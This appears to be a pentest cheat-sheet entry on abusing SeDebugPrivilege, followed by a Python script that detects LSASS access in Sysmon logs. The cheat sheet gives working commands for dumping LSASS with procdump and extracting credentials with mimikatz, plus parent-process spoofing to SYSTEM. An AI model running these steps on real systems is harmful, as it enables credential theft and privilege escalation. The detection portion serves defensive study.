6. SeDebugPrivilege

1. Verify that the current token holds SeDebugPrivilege:

  • whoami /priv

2. Dump LSASS:

  • procdump.exe -accepteula -ma lsass.exe lsass.dmp

  • (Task Manager: Right-click lsass.exe -> Create dump file)

3. Extract Credentials:

  • mimikatz.exe

  • sekurlsa::minidump lsass.dmp

  • sekurlsa::logonpasswords

4. RCE as SYSTEM:

  • [MyProcess]::CreateProcessFromParent(<PID>,"cmd.exe","") (PowerShell)

  • (Alternative tools: the exact syntax depends on the tool used)

Tools:

  • pypykatz: For LSASS dump analysis on non-Windows systems.

  • Process Explorer (Sysinternals): For detailed process information.

  • WinDbg: For advanced process debugging and memory analysis.

Techniques:

  • DLL Injection: Injecting malicious code into privileged processes.

  • Handle Duplication: Gaining access to privileged process resources.

  • Exploiting Vulnerable Drivers: Leveraging SeDebugPrivilege to exploit kernel vulnerabilities.

  • Bypassing User Account Control (UAC): using a UAC bypass to obtain the elevated prompt that SeDebugPrivilege requires.
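From the detection side, as an added example that is not part of the original notes: the handle-access pattern behind steps 2 to 4 and the Handle Duplication and DLL Injection items, as it appears in Sysmon Event ID 10 (ProcessAccess) records. Field names follow Sysmon's schema; the sample events are constructed and the allow-list is an assumption to tune per host.

```python
# Added example (not from the original notes): flags handles opened on lsass.exe with rights
# the techniques above need. Events are CONSTRUCTED samples; the allow-list is an ASSUMPTION.

# Access-mask bits from winnt.h and what each enables against lsass.exe.
ACCESS_BITS = {
    "PROCESS_VM_READ": 0x0010,         # required by MiniDumpWriteDump (procdump / Task Manager dump)
    "PROCESS_VM_WRITE": 0x0020,        # DLL injection
    "PROCESS_DUP_HANDLE": 0x0040,      # handle duplication
    "PROCESS_CREATE_PROCESS": 0x0080,  # parent-process spoofing (CreateProcessFromParent)
}

# Sources allowed to open LSASS on this host (ASSUMPTION; stored lower-case). Task Manager is
# deliberately NOT listed, since the notes above use it to create the dump.
ALLOWED_SOURCES = {
    r"c:\windows\system32\wbem\wmiprvse.exe",
}


def classify(event):
    """Return the names of suspicious rights granted on lsass.exe, or [] if the event is benign."""
    if event.get("EventID") != 10:
        return []
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return []
    if event.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return []
    granted = int(event["GrantedAccess"], 16)  # Sysmon logs the mask as a hex string
    return [name for name, bit in ACCESS_BITS.items() if granted & bit]


def scan(events):
    """Return (SourceImage, GrantedAccess, hits) for every event that should alert."""
    return [(e["SourceImage"], e["GrantedAccess"], hits) for e in events if (hits := classify(e))]


LSASS = r"C:\Windows\system32\lsass.exe"
SAMPLE_EVENTS = [  # constructed, not captured
    {"EventID": 10, "SourceImage": r"C:\Tools\procdump.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\tool.exe", "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\wbem\WmiPrvSE.exe", "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\tool.exe", "TargetImage": LSASS, "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\tool.exe", "TargetImage": r"C:\Windows\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for source, access, hits in scan(SAMPLE_EVENTS):
        print(f"ALERT {source} opened lsass.exe with {access}: {', '.join(hits)}")
```

A mask of 0x1400 (query-only rights) is left alone, while 0x1FFFFF (PROCESS_ALL_ACCESS) trips every bit; the allow-listed WMI provider is skipped regardless of mask.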
